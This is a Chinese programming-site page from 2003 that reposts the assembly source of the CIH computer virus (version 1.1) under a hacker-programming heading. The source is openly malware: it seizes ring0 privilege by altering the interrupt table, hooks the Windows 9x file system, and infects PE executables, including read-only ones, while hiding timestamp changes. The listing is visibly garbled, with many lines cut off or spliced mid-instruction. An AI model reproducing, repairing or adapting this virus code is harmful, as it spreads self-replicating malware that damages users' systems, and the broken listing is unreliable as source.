登录社区:用户名: 密码: 忘记密码 网页功能:加入收藏 设为首页 网站搜索  

文档

下载

图书

论坛

安全

源码

硬件

游戏
首页 信息 空间 VB VC Delphi Java Flash 补丁 控件 安全 黑客 电子书 笔记本 手机 MP3 杀毒 QQ群 产品库 分类信息 编程网站
 内容搜索 网页 下载 源代码
热点文章
  利用鼠标键盘钩子截获密码
  利用鼠标键盘钩子截获密码
  如何将多个文件捆绑成一个可..
  如何将多个文件捆绑成一个可..
  内核级HOOK的几种实现与应用
  内核级HOOK的几种实现与应用
  书写基于内核的linux键盘纪录..
  书写基于内核的linux键盘纪录..
  CIH病毒原码
  CIH病毒原码
  编写进程/线程监视器
  编写进程/线程监视器
本站原创
  利用鼠标键盘钩子截获密码
  利用鼠标键盘钩子截获密码
最新招聘信息

您现在的位置:立华软件园->安全防线->黑客编程
CIH病毒原码
发表日期:2003-10-30作者:[] 出处:  

; * The Virus Program Information *

;

****************************************************************************

; * *

; * Designer : CIH Original Place : TTIT of Taiwan *

; * Create Date : 04/26/1998 Now Version : 1.1 *

; * Modification Time : 05/15/1998 *

; * *

;

*==========================================================================*

; * Modification History *

;

*==========================================================================*

; * v1.0 1. Create the Virus P *

; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *

; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *

; * 6. When System Opens Existing PE File, the File will be *

; * Infected, and the File doesn't be Reinfected. *

; * 7. It is also Infected, even the File is Read-Only. *

; * 8. When the File is Infected, the Modification Date and Time *

; * of the File also don't be Changed. *

; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *

; * Previous FileSystemApiHook, it will Call the Function *

; * that the IFS Managle that be Infected will not Increase *

; * it's Size... ^__^ *

; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *

; * When Exception Error Occurs, Our OS System should be in *

; * Windows NT. So My Cute Virus will not Continue to Run, *

; * it will Jmup to Original Application to Run. *

; * 3. Use Better Algorithm, Reduce Virus Code Size. *

; * 4. The Virus "Basic" Size is only 796 Bytes. *

;

****************************************************************************

.586P

; ********************************************************************ALSE =

0

DEBUG = TRUE

MajorVirusVersion = 1

MinorVirusVersion = 1

VirusVersion = MajorVirusVersion*10h+MinorVirusVersion

HookExceptionNumber = 03h

FileNameBufferSize = 7fh

; *********************************************************

; *********************************************************

VirusGame SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame

ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************

; * Ring3 Virus Game Initial Program *

; *********************************************************

MyVirusStart:

push ebp

; *************************************

; * Let's Modify Structured Exception *

; * Handing, Prevent Exception Error *

; * Occurrence, Especially in NT. *

; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx

xchg eax, fs:[ebx]

call @0

@0:

pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]

push ecx

push eax

; *************************************

; * Let's Modify *

; * IDT(Interrupt Descriptor Table) *

; * to Get Ring0 Privilege... *

; *************************************

push eax ;

sidt [esp-02h] ; Get IDT Base Address

pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ; Get Exception Base

ebx-04h], si ;

shr esi, 16 ; Modify Exception

mov [ebx+02h], si ; Entry Point Address

pop esi

; *************************************

; * Generate Exception to Get Ring0 *

; *************************************

int HookExceptionNumber ; GenerateException

ReturnAddressOfEndException = $

; *************************************

; * Merge All Virus Code Section *

; *************************************

push esi

mov esi, eax

LoopOfMergeAllVirusCodeSection:

mov ecx, [eax-04h]

rep movsb

sub eax, 08h

mov esi, [eax]

or esi, esi

jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

jmp LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

pop esi

; *************************************

; * Generate Exception Again *

; *************************************

int HookExceptionNumber ; GenerateException Ag

ain

; *************************************

; * Let's Restore *

; * Structured Exception Handing *

; *************************************

ReadyRestoreSE:

sti

xor ebx, ebx

jmp RestoreSE

; *************************************

; * When Exception Error Occurs, *

; * Our OS System should be in NT. *

; * So My Cute Virus will not *

; * Continue to Run, it Jmups to *

; * Original Application to Run. *

; *************************************

StopToRunVirusCode:

@1 = StopToRunVirusCode

xor ebx, ebx

mov eax, fs:[ebx]

mov esp, [eax]

RestoreSE:

pop dword ptr fs:[ebx]

pop eax

; *************************************

; * Return Original App to Execute *

; *************************************

pop ebp

push 00401000h ; Push Original

OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

ret ; Re*********************************

MyExceptionHook:

@2 = MyExceptionHook

jz InstallMyFileSystemApiHook

; *************************************

; * Do My Virus Exist in System !? *

; *************************************

mov ecx, dr0

jecxz AllocateSystemMemoryPage

add dword ptr [esp], ReadyRestoreSE-ReturnAddressO

fEndException

; *************************************

; * Return to Ring3 Initial Program *

; *************************************

ExitRing0Init:

mov [ebx-04h], bp ;

shr ebp, 16 ; Restore Exception

mov [ebx+02h], bp ;

iretd

; *************************************

; * Allocate SystemMemory Page to Use *

; *************************************

AllocateSystemMemoryPage:

mov dr0, ebx ; Set the Mark of My Virus Exi

st in System

push 00000000fh ;

push ecx ;

push 0ffffffffh ;

push ecx ;

push ecx ;

push ecx ;

push 000000001h ;

push 000000002h ;

int 20h ; VMMCALL _PageAllocate

_PageAllocate = $ ;

dd 00010053h ; Use EAX, ECX, EDX, and flags

add esp, 08h*04h

xchg edi, eax ; EDI = SystemMemory Start Add

ress

lea eax, MyVirusStart-@2[esi]

iretd ; Return to Ring3 Initial Program

; *************************************

; * Install My File System Api Hook *

; ************************0h ; VXDCALL IFSMgr_InstallFileSystemApiHook

IFSMgr_InstallFileSystemApiHook = $ ;

dd 00400067h ; Use EAX, ECX, EDX, and flags

mov dr0, eax ; Save OldFileSystemApiHook Ad

dress

pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point

mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]

mov edx, [ecx]

mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point

lea eax, InstallFileSystemApiHook-@3[eax]

mov [ecx], eax

cli

jmp ExitRing0Init

; *********************************************************

; * Code Size of Merge Virus Code Section *

; *********************************************************

CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************

; * IFSMgr_InstallFileSystemApiHook *

; *********************************************************

InstallFileSystemApiHook:

push ebx

call @4 ;

@4: ;

pop ebx ; mov ebx, offset FileSystemApiHook

add ebx, FileSystemApiHook-@4 ;

push ebx

int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook

IFSMgr_RemoveFileSystemApiHook = $

dd 00400068h ; Use EAX, ECX, EDX, and flags

pop eax

; Call Original IFSMgr_InstallFileSystemApiHook

; to Link Client FileSystemApiHook

push dword ptr [esp+8]

call OldInstallFileSystemApiHook-@3[ebx]

pop ecx

push eax

; Call Original IFSMgr_InstallFileSystemApiHook

******

; * Static Data *

; *********************************************************

OldInstallFileSystemApiHook dd ?

; *********************************************************

; * IFSMgr_FileSystemHook *

; *********************************************************

; *************************************

; * IFSMgr_FileSystemHook Entry Point *

; *************************************

FileSystemApiHook:

@3 = FileSystemApiHook

pushad

call @5 ;

@5: ;

pop esi ; mov esi, offset VirusGameDataStartAd

dress

add esi, VirusGameDataStartAddress-@5

; *************************************

; * Is OnBusy !? *

; *************************************

test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy

)

jnz pIFSFunc ; goto pIFSFun

c

; *************************************

; * Is OpenFile !? *

; *************************************

; if ( NotOpenFile )

***********************

; * Get FilePath's DriveNumber, *

; * then Set the DriveName to *

; * FileNameBuffer. *

; *************************************

; * Ex. If DriveNumber is 03h, *

; * DriveName is 'C:'. *

; *************************************

; mov esi, offset FileNameBuffer

add esi, FileNameBuffer-@6

push esi

mov al, [ebx+04h]

cmp al, 0ffh

je CallUniToBCSPath

add al, 40h

mov ah, ':'

mov [esi], eax

inc esi

inc esi

; *************************************

; * UniToBCSPath *

; *************************************

; * This Service Converts *

; * a Canonicalized Unicode Pathname *

; * to a Normal Pathname in the *

; * Specified BCS Character Set. *

; *************************************

CallUniToBCSPath:

push 00000000h

push FileNameBufferSize

mov ebx, [ebx+10h]

20h ; VXDCall UniToBCSPath

UniToBCSPath = $

dd 00400041h

add esp, 04h*04h

; *************************************

; * Is FileName '.EXE' !? *

; *************************************

; cmp [esi+eax-04h], '.EXE'

cmp [esi+eax-04h], 'EXE.'

pop esi

jne DisableOnBusy

IF DEBUG

; *************************************

; * Only for Debug *

; *************************************

; cmp [esi+eax-06h], 'FUCK'

cmp [esi+eax-06h], 'KCUF'

jne DisableOnBusy

ENDIF

; *************************************

; * Is Open Existing File !? *

; *************************************

; if ( NotOpenExistingFile )

; goto DisableOnBusy

cmp word ptr [ebx+18h], 01h

jne DisableOnBusy

; *************************************

; * Get Attributes of the File *

; *************************************

mov ax, 4300h

int 20h push ecx

; *************************************

; * Get IFSMgr_Ring0_FileIO Address *

; *************************************

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]

mov edi, [edi]

; *************************************

; * Is Read-Only File !? *

; *************************************

test cl, 01h

jz OpenFile

; *************************************

; * Modify Read-Only File to Write *

; *************************************

mov ax, 4301h

xor ecx, ecx

call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Open File *

; *************************************

OpenFile:

xor eax, eax

mov ah, 0d5h

xor ecx, ecx

xor edx, edx

inc edx

mov ebx, edx

inc ebx

call edi ; VXDCall IFSMgr_Ring0_FileIO

xchg ebx, eax ; mov ebx, FileHandle

; *************************************

; * Need to Restore *

; * Attributes of the File !? *

; *************************************

pop ecx

pushf

1h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Is Open File OK !? *

; *************************************

IsOpenFileOK:

popf

jc DisableOnBusy

; *************************************

; * Open File Already Succeed. ^__^ *

; *************************************

push esi ; Push FileNameBuffer Address to Stack

pushf ; Now CF = 0, Push Flag to Stack

add esi, DataBuffer-@7 ; mov esi, offset DataBuffe

r

; ***************************

; * Get OffsetToNewHeader *

; ***************************

xor eax, eax

mov ah, 0d6h

; For Doing Minimal VirusCode's Length,

; I Save EAX to EBP.

mov ebp, eax

xor ecx, ecx

mov cl, 04h

xor edx, edx

mov dl, 3ch

call edi ; VXDCall IFSMgr_Ring0_FileIO

mov edx, [esi]

; ***************************

; * Get 'PE\0' Signature *

; * of ImageFileHeader, and *

; * Infected Mark. *

; ***************************

dec edx

mov eax, ebp

call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************

; * Is PE !? *

; ***************************

; * Is the File *

; * Already Infected !? *

; ***************************

; cmp [esi], '\0PE\0'

cmp dword ptr [esi], 00455000h

jne CloseFile

; *************************************

; * The File is ^o^ *

; * PE(Portable Executable) indeed. *

; *************************************

; * The File isn't also Infected. *

; *************************************

; *************************************

; * Start to Infect the File *

; *************************************

; * Registers Use Status Now : *

; * *

; * EAX = 04h *

; * EBX = File Handle *

; * ECX = 04h *

; * EDX = 'PE\0\0' Signature of *

; * ImageFileHeader Pointer's *

; * Former Byte. *

; * ESI = DataBuffer Address == @8 *

; * EDI = IFSMgr_Ring0_FileIO Address *

; * EBP = D600h == Read Data in File *

; *************************************

; * Stack Dump : *

; * *

; * ESP = ------------------------- *

; * | EFLAG(CF=0) | *

; * ------------------------- *

; * | FileNameBufferPointer | *

; * ------------------------- *

; * | EDI | *

; * ------------------------- *

; * | ESI | *

; * ------------------------- *

; * | EBP | *

; * ------------------------- *

; * | ESP | *

; * ------------------------- *

; * | EBX | *

; * ------------------------- *

; * | EDX | *

; * ------------------------- *

; * | ; * ------------------------- *

; *************************************

push ebx ; Save File Handle

push 00h ; Set VirusCodeSectionTableEndMark

; ***************************

; * Let's Set the *

; * Virus' Infected Mark *

; ***************************

push 01h ; Size

push edx ; Pointer of File

push edi ; Address of Buffer

; ***************************

; * Save ESP Register *

; ***************************

mov dr1, esp

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Only First Set Size ) *

; ***************************

push eax ; Size

; ***************************

; * Let's Read *

; * Image Header in File *

; ***************************

mov eax, ebp

mov cl, SizeOfImageHeaderToRead

add edx, 07h ; Move EDX to NumberOfSections

call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************

; * Let's Set the *

; * NewAddressOfEntryPoint *

; * ( Set Pointer of File, *

; * Address of Buffer ) *

; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]

push eax ; Pointer of File

lea eax, (NewAddressOfEntryPoint-@8)[esi]

push eax ; Address of Buffer

; ***************************

; * Move EDX to the Start *

; * of SectionTable in File *

; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]

lea edx, [eax+edx+12h]

; ***************************

; * Let's Get *

; * Total Size of Sections *

; ***************************

mov al, SizeOfScetionTable

; I Assume NumberOfSections *

; * Need to Restore File *

; * Modification Time *

; ***************************

SetFileModificationMark:

pop ebx

pop eax

stc ; Enable CF(Carry Flag)

pushf

; *************************************

; * Close File *

; *************************************

CloseFile:

xor eax, eax

mov ah, 0d7h

call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Need to Restore File Modification *

; * Time !? *

; *************************************

popf

pop esi

jnc DisableOnBusy

; **************************** mov ecx, (FileModificationTime-@7)[esi]

mov edi, (FileModificationTime+2-@7)[esi]

call ebx ; VXDCall IFSMgr_Ring0_FileIO

; *************************************

; * Disable OnBusy *

; *************************************

DisableOnBusy:

dec byte ptr (OnBusy-@7)[esi] ; Disable OnBu

sy

; *************************************

; * Call Previous FileSystemApiHook *

; ************st. *

; *************************************

pIFSFunc:

mov ebx, esp

push dword ptr [ebx+20h+04h+14h] ; Push pioreq

call [ebx+20h+04h] ; Call pIFSFun

c

pop ecx ;

mov [ebx+1ch], eax ; Modify EAX Value in Stack

; ***************************

; * After Calling pIFSFunc, *

; * Get Some Data from the *

; * Returned pioreq. *

; ***************************

cmp dword ptr [ebx+20h+04h+04h], 00000024h

jne QuitMyVirusFileSystemHook

; *****************

; * Get the File *

; * Modification *

; * Date and Time *

; * in DOS Format.*

; *****************

mov eax, [ecx+28h]

mov (FileModificationTime-@6)[esi], eax

; ***************************

; * Quit My Virus' *

; * IFSMgr_FileSystemHook *

; ***************************

QuitMyVirusFileSystemHook:

popad

ret

; *********************************************************

; * Static Data *

; *****_RemoveFileSystemApiHook-_PageAllocate

db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook

db IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h

Virus Size *

; *********************************************************

VirusSize = $

; + SizeOfVirusCodeSectionTableEndMark(04h)

; + NumberOfSections(??)*SizeOfVirusCodeSectionT

able(08h)

; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************

; * Dynamic Data *

; *********************************************************

VirusGameDataStartAddress = VirusSize

@6 = VirusGameDataStartAddress

OnBusy db 0

FileModificationTime dd ?

FileNameBuffer db FileNameBufferSize dup(?)

@7 = FileNameBuffer

DataBuffer = $

@8 = DataBuffer

NumberOfSections dw ?

TimeDateStamp dd ?

SymbolsPointer dd ?

NumberOfSymbols dd ?

SizeOfOptionalHeader dw ?

_Characteristics dw ?

Magic dw ?

LinkerVersion dw ?

SizeOfCode dd ?

SizeOfInitializedData dd ?

SizeOfUninitializedData dd ?

AddressOfEntryPoint dd ?

BaseOfCode dd ?

BaseOfData dd ?

ImageBase dd ?

@9 = $

SectionAlignm dd ?

SizeOfImage dd ?

SizeOfHeaders dd ?

SizeOfImageHeaderToRead = $-NumberOfSections

NewAddressOfEntryPoint = DataBuffer ; DWORD

SizeOfImageHeaderToWrite = 04h

StartOfSectionTable = @9

SectionName = StartOfSectionTable ; QWORD

VirtualSize = StartOfSectionTable+08h ; DWORD

VirtualAddress = StartOfSectionTable+0ch ; DWORD

SizeOfRawData = StartOfSectionTable+10h ; DWORD

PointerToRawData = StartOfSectionTable+14h ; DWORD

PointerToRelocations = StartOfSectionTable+18h ; DWORD

PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD

NumberOfRelocations = StartOfSectionTable+20h ; WORD

NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD

Characteristics = StartOfSectionTable+24h ; DWORD

SizeOfScetionTable = Characteristics+04h-SectionName

; *********************************************************

; * Virus Total Need Memory *

; *********************************************************

VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9

; + NumberOfSections( + NumberOfSections(??)*SizeOfVirusCodeSectionT

able(08h)

; + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************

; *********************************************************

VirusGame ENDS

END FileHeader

我来说两句】 【发送给朋友】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 CIH病毒原码
关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接

Copyright ©2001-2003 Allrights reserved
e_mail:站长:webmaster(at)lihuasoft.net
网站编程QQ群  
京ICP备05001064号

页面生成时间:0.00715